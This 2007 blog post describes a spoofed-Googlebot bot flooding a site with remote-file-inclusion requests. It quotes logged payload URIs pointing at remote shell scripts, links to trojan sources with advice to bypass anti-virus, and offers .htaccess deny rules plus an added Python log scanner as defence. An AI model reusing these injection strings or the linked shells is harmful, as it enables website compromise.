For the past three days this blog has been suffering a DoS attack. The attack is still going on and I don't think they will leave yet. I can't ban this bot directly, because they are sending forged packets (packet spoofing) that appear to come from Googlebot (http://www.whois-search.com/whois/64.233.166.136). I'm still looking for the right ISP.

```text
OrgName:    Google Inc.
OrgID:      GOGL
Address:    1600 Amphitheatre Parkway
City:       Mountain View
StateProv:  CA
PostalCode: 94043
Country:    US
```

For the time being I have blocked all remote streams from their random *.com hosts and the "perl bot signature", but blocking will not stop them from hammering this site. I'll be sending 503 (Service Unavailable) on certain requests, so if you have problems accessing this site please check back later.
Type of injections
There are a lot of URI parameters in my logs (I will disable the server logs to limit resources); they probably have a large inventory of check-lists of known CMS vulnerabilities. I can only confirm that it is a blackhat SEO spam bot, as their request URIs include the typical order.php page.

```text
/es/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-jagger-goro-class-mailphp/order.php/?wp=http://hom3.t35.com/xpl/hack/id.txt?
/es/wordpress/order.php/?wp=http://hom3.t35.com/xpl/hack/id.txt?
/order.php?wp=http://hom3.t35.com/xpl/hack/id.txt?
```

To view the following sources you need to exclude the website host from your anti-virus program.
- Perl/ShellBot.B trojan - http://hom3.t35.com/xpl/fidz/hack/bnc.txt
- PHP/Rst.S Trojan - http://hom3.t35.com/xpl/fidz
.htaccess to block the bad code injector and Perl bot (botnet)
If you have similar problems, you should block the following domains in your .htaccess.

```apache
# mod_setenvif: flag requests by Referer (the hosts the injections come from) and by User-Agent
SetEnvIfNoCase Referer "^http://(www\.)?t35\.com" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www\.)?jorgevolio\.com" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www\.)?emabe\.com" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www\.)?pawang\.in" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www\.)?gw-gold\.net" codeinjector_ref=1
# a bare prefix is enough here; a trailing "*" would only make the last letter optional
SetEnvIfNoCase User-Agent "^libwww-perl" shell_bots=1
SetEnvIfNoCase User-Agent "^Amidalla" shell_bots=1
<FilesMatch "(.*)">
    # with Order Allow,Deny the Deny lines take precedence over Allow from all
    Order Allow,Deny
    Allow from all
    Deny from env=codeinjector_ref
    Deny from env=shell_bots
</FilesMatch>
```

If you aren't sure whether your server supports mod_setenvif, wrap it as in the example below.

```apache
<IfModule mod_setenvif.c>
    # ...replace this line with the above code...
</IfModule>
```
How to trap the Perl shell bot
We need a pattern to trap these bots. We certainly know that these bots:
- don't honor robots.txt
- crawl all subdirectories
- have a pattern in their URI requests
For now I have only created a subdirectory for auto-banning (and some other stuff) based on their pattern. The Alexa bot will be banned too, as it doesn't honor robots.txt.
I'll be updating this post from time to time. Do check the related articles on packet spoofing and on validating forged/spoofed packets.
Recent Scan & Update
The list below is added automatically.
- December 24, 2007 - ip: 64.26.63.10, param: login=,?, inject: http://pawang.in/r57.txt
- December 24, 2007 - ip: 64.26.63.10, param: dir=,login=, inject: http://pawang.in/r57.txt????
- December 25, 2007 - ip: 59.158.128.138, param: p=,:allinurl=, inject: http://gw-gold.net/jpg/pictures/test.txt
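As an added example (not code from the original post), here is a small log scanner that applies the patterns described above to Apache combined-format log lines: it flags requests whose query parameter points at a remote script (the order.php?wp=http://... injections), the libwww-perl/Amidalla User-Agents from the .htaccess rules, and hits on a robots.txt-disallowed trap directory, and emits records in the same ip/param/inject shape as the scan list. The trap path `/trap/` and the sample log lines are constructed assumptions; only the hosts and IPs the post names are taken from the post.

```python
import re
from urllib.parse import urlsplit, parse_qsl
# Apache combined log: ip - - [time] "METHOD uri PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

SHELL_BOT_UA = ("libwww-perl", "amidalla")   # same User-Agent prefixes as the .htaccess rules
TRAP_PREFIX = "/trap/"                       # hypothetical directory listed as Disallow in robots.txt
REMOTE_INCLUDE_RE = re.compile(r"^(https?|ftp)://\S+", re.IGNORECASE)

def parse_line(line):
    """Split one combined-log line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def find_injection(entry):
    """Return (param, url) for the first query parameter whose value is a remote URL, else None."""
    for name, value in parse_qsl(urlsplit(entry["uri"]).query, keep_blank_values=True):
        if REMOTE_INCLUDE_RE.match(value):
            return name, value.rstrip("?")   # the bots append stray '?' to the payload URL
    return None

def scan(lines):
    """One record per suspicious request, in the shape of the post's scan list (ip/param/inject)."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        inj = find_injection(entry)
        ua_match = entry["ua"].lower().startswith(SHELL_BOT_UA)
        trap = entry["uri"].startswith(TRAP_PREFIX)
        if inj or ua_match or trap:
            hits.append({"ip": entry["ip"], "param": inj[0] if inj else "",
                         "inject": inj[1] if inj else "", "ua_match": ua_match, "trap": trap})
    return hits

# Constructed sample lines (not the post's own logs); the hosts and the first two IPs are those the post names
SAMPLE_LOG = """\
64.26.63.10 - - [24/Dec/2007:10:02:11 +0000] "GET /wp-login.php?login=http://pawang.in/r57.txt? HTTP/1.0" 404 512 "-" "libwww-perl/5.805"
64.233.166.136 - - [24/Dec/2007:10:02:12 +0000] "GET /order.php?wp=http://hom3.t35.com/xpl/hack/id.txt? HTTP/1.0" 503 0 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
198.51.100.9 - - [24/Dec/2007:10:02:30 +0000] "GET /trap/index.php HTTP/1.0" 200 44 "-" "Mozilla/4.0"
203.0.113.7 - - [24/Dec/2007:10:03:40 +0000] "GET /index.php?p=42 HTTP/1.1" 200 8120 "http://example.net/" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(hit)
```

Feeding the real access log through `scan()` gives the IPs to hand to the auto-ban rule; a spoofed Googlebot User-Agent is not trusted here, only the request itself is judged.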
- December 21, 2007 at 10:48 pm
- February 16, 2008 at 3:05 am
Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot & Trojan